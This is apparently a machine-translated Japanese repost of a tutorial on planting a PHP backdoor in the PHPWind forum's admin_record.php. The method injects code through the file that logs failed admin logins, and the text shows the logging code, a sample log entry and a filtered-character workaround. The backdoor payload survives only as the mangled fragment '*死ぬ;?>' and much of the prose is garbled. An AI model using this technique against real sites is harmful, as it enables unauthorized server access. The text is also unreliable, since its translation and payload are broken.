pw_PHP チュートリアルのバックドア メソッドの分析
- WBOYオリジナル
- 2016-07-21 15:55:011041ブラウズ
pw
databbscacheadmin_record.php にバックドアを置く方法は、バックグラウンドでのログインと操作を記録することです。このファイルの操作方法を見てみましょう:
$bbsrecordfile=D_P."data/bbscache/admin_record.php ";
if(!file_exists($bbsrecordfile)){
writeover($bbsrecordfile,"n");
}//これは、admin_record.php を使用しないことを意味するだけです。コードにより
admin_record.php を編集して を削除したらどうなるでしょうか :)
コードを見て admin_record.php に書き込んでみましょう
バックグラウンドで http://localhost/PHPVind_GBK_6.0RC/upload/admin.php
間違ったユーザーでログインすると、次のレコードが記録されます:
|admin|s|Logging Failed|127.0.0.1|1191667510|
ふふ、これでコードを書くことができますが、ここにはフィルタリングがあり、< を使用することはできません
したがって、バックドアは次のようにする必要があります: *死ぬ;?>
http://www.bkjia.com/PHPjc/318403.html
。声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。